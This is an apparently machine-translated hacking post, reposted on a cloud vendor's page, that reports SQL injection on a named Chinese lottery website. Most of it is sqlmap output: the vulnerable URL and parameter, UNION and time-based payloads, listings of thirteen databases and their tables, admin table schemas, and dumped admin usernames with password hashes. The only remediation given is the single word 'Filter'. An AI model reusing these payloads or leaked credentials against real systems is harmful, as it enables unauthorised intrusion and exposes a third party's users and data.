Jinan Fu Cai net has SQL injection. Cause leakage of other databases

Source: Internet
Author: User

Jinan Fu Cai net has SQL injection. Cause leakage of other databases

Last time it was Guangdong de.
This time, the account has no money to decrypt the token 5. Boring background

Jinan Fu caiwang

Http://www.jnscp.cn/

Http://www.jnscp.cn/detailNews.jsp? Newsid= 2645 (GET)
 

sqlmap identified the following injection points with a total of 88 HTTP(s) requests:---Parameter: NewsID (GET)    Type: UNION query    Title: MySQL UNION query (NULL) - 19 columns    Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: NewsID (GET)    Type: UNION query    Title: MySQL UNION query (NULL) - 19 columns    Payload: NewsID=2645 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7671,0x46564e66594849515267,0x716a787071),NULL,NULL,NULL#    Type: AND/OR time-based blind    Title: MySQL > 5.0.11 AND time-based blind    Payload: NewsID=2645 AND SLEEP(5)---web application technology: JSPback-end DBMS: MySQL 5.0.11available databases [13]:[*] caipiaodata[*] examine[*] information_schema[*] jiaoyou[*] jiuxiang[*] jnsz[*] kptest[*] mysql[*] test[*] test2[*] wenliandata[*] yyzyhj[*] zldb





Multiple databases

Only [*] caipiaodata

Is the website

Other Websites

What other websites do I know?

Database: zldb + tables + --------- + | Table | Entries | + ------------------------------------- + --------- + | news | 52 | pic | 8 | news_kind | 4 | 'user' | 1 | + hour --------------------------------------- + --------- + Database: wenliandata + tables + --------- + | Table | Entries | + --------------------------------------- + --------- + | log | 6797 | news | 1288 | specnews | 53 | bigclass | 39 | smallclass | 10 | specclass | 2 | admin | 1 | config | 1 | + --------------------------------------- + --------- + Database: jiuxiang + tables + --------- + | Table | Entries | + tables + --------- + | shop_area | 3162 | shop_city | 345 | shop_role_menu | 58 | shop_menu | 40 | shop_goods_attribute | 39 | shop_goods_category | 36 | shop_goods | 35 | shop_province | 34 | shop_order_goods | 32 | shop_order | 29 | shop_user | 21 | shop_user_detail | 21 | shop_image | 17 | shop_image_type | 15 | shop_category | 13 | shop_category_big | 13 | metrics | 11 | shop_goods_comm | 8 | shop_info_type | 7 | shop_paytype | 5 | sys_param | 5 | role | 4 | shop_role | 4 | shop_ask | 3 | shop_brand | 3 | shop_delivery | 3 | shop_goodscart | 3 | shop_model_attribute | 3 | shop_user_grad | 3 | shop_admin | 2 | shop_categorybig | 2 | shop_favorite | 2 | shop_info | 1 | shop_model | 1 | shop_provider | 1 | shop_store_in | 1 | shop_store_in_detail | 1 | system_param | 1 | + --------------------------------------- + --------- + Database: jnsz + keys + --------- + | Table | Entries | + keys + --------- + | enterprisedata | 496 | enterpriseinfo | 410 | sys_menu_role | 320 | sys_data_role | 62 | sys_dictionary | 54 | sys_menu | 35 | sys_userrole | 26 | sys_user | 22 | sys_role | 21 | sys_organization | 18 | sys_icon | 4 | sys_organizationrole | 4 | sys_userposition | 2 | sys_position | 1 | sys_positionrole | 1 | + --------------------------------------- + --------- + Database: jiaoyou + ----------------------------------- + --------- + | Table | Entries | + hour + --------- + | hyly | 23883 | log | 8276 | yyhy | 1519 | zxhy | 1056 | users | 857 | news | 277 | ykreg | 256 | eventregistration | 114 | links | 66 | hzhb | 57 | hyarea | 17 | yyvideo | 10 | bigclass | 9 | blinddates | 6 | yytype | 6 | alipay | 5 | paytype | 5 | message | 4 | admin | 1 | config | 1 | + --------------------------------- + --------- + Database: yyzyhj + ----------------------------------- + --------- + | Table | Entries | + hour + --------- + | hyly | 15829 | log | 7746 | yyhy | 1260 | zxhy | 1036 | users | 840 | news | 242 | ykreg | 122 | eventregistration | 114 | hzhb | 57 | links | 35 | hyarea | 17 | yyvideo | 10 | bigclass | 9 | alipay | 6 | blinddates | 6 | yytype | 6 | paytype | 5 | message | 4 | admin | 1 | config | 1 | + --------------------------------- + --------- + Database: examine + records + --------- + | Table | Entries | + records + --------- + | t_examineevaluate | 330771 | t_examinescore | 31955 | t_examineperson | 13068 | employee | 1287 | department | 168 | t_examinepublish | 91 | t_examinecontenta | 39 | t_examinecontent | 16 | unit | 12 | t_employeetype | 8 | employee_old | 7 | t_examinetable | 7 | 'position' | 5 | t_examineindex | 5 | t_examinetype | 3 | admin | 2 | + --------------------------------------- + --------- + Database: information_schema + TABLES + --------- + | Table | Entries | + TABLES + --------- + | COLUMNS | 2622 | STATISTICS | 410 | KEY_COLUMN_USAGE | 219 | TABLES | 202 | TABLE_CONSTRAINTS | 195 | shards | 126 | COLLATIONS | 126 | SCHEMA_PRIVILEGES | 114 | USER_PRIVILEGES | 105 | CHARACTER_SETS | 36 | SCHEMATA | 13 | + shards + --------- + Database: mysql + metrics + --------- + | Table | Entries | + metrics + --------- + | help_relation | 724 | help_topic | 458 | help_keyword | 378 | help_category | 36 | 'user' | 9 | db | 8 | + ----------------------------------------- + --------- + Database: kptest + tables + --------- + | Table | Entries | + tables + --------- + | t_examineevaluate | 162681 | t_examineperson | 4219 | t_examinescore | 192 | t_examinecontenta | 37 | t_employeetype | | t_examinecontent | 8 | t_examinetable | 8 | employee_old | 7 | 'position' | 5 | t_examineindex | 5 | department | 3 | employee | 3 | t_examinepublish | 3 | t_examinetype | 3 | admin | 2 | unit | 1 | + --------------------------------------- + --------- + Database: caipiaodata + response + --------- + | Table | Entries | + --------------------------------------- + --------- + | log | 6497 | news | 2533 | message | 164 | bigclass | 22 | admin | 2 | config | 1 | + ------------------------------------- + --------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) Type: UNION query Title: MySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL # Type: AND/OR time-based blind Title: MySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin [6 columns] + ---------------- + ------------- + | Column | Type | + ---------------- + ------------- + | adminId | int (4) | adminLoginIP | varchar (30) | adminLoginTime | varchar (30) | adminName | varchar (50) | adminPwd | varchar (50) | role | varchar (10) | + ---------------- + ------------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) Type: UNION query Title: mySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL, NULL # Type: AND/OR time-based blind Title: mySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: kptestTable: admin [2 entries] + -------------------------------------- + ----------- + | adminPwd | adminName | + -------------------------------------- + ----------- + | quit (1) | admin | response | + ------------------------------------ + ----------- + sqlmap identified the following injection points with a total of 0 HTTP (s) requests: --- Parameter: NewsID (GET) type: UNION query Title: MySQL UNION query (NULL)-19 columns Payload: NewsID = 2645 union all select null, NULL, NULL, CONCAT (0x71626a7671, 0x46564e66594849515267, 0x716a787071), NULL, NULL # Type: AND/OR time-based blind Title: mySQL> 5.0.11 AND time-based blind Payload: NewsID = 2645 and sleep (5) --- web application technology: JSPback-end DBMS: MySQL 5.0.11Database: caipiaodataTable: admin [18 columns] + --------------- + ------------- + | Column | Type | + --------------- + ------------- + | AddTime | varchar (20) | AdminID | int (11) | AdminName | varchar (32) | AdminPwd | varchar (64) | AdminType | smallint (6) | LastLoginIP | varchar (50) | LastLoginTime | varchar (50) | LoginNum | int (11) | NewsNum | int (11) | UserAddress | varchar (80) | UserBirthday | varchar (10) | UserEmail | varchar (50) | UserInfo | longtext | UserName | varchar (20) | UserQQ | varchar (10) | UserSex | char (2) | UserTel | varchar (50) | UserZip | varchar (6) | + --------------- + ------------- +







caipiaodata

UserName, AdminPwdadmin, 31461AB060AFBB91E561047381356F5B ah, 31461AB060AFBB91E561047381356F5B



kptest

AdminPwd, adminNameC4CA4238A0B923820DCC509A6F75849B (1), admin3069C374C533AE8D7928DA242B6A9825, Zhang San

 

Solution:

Filter

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.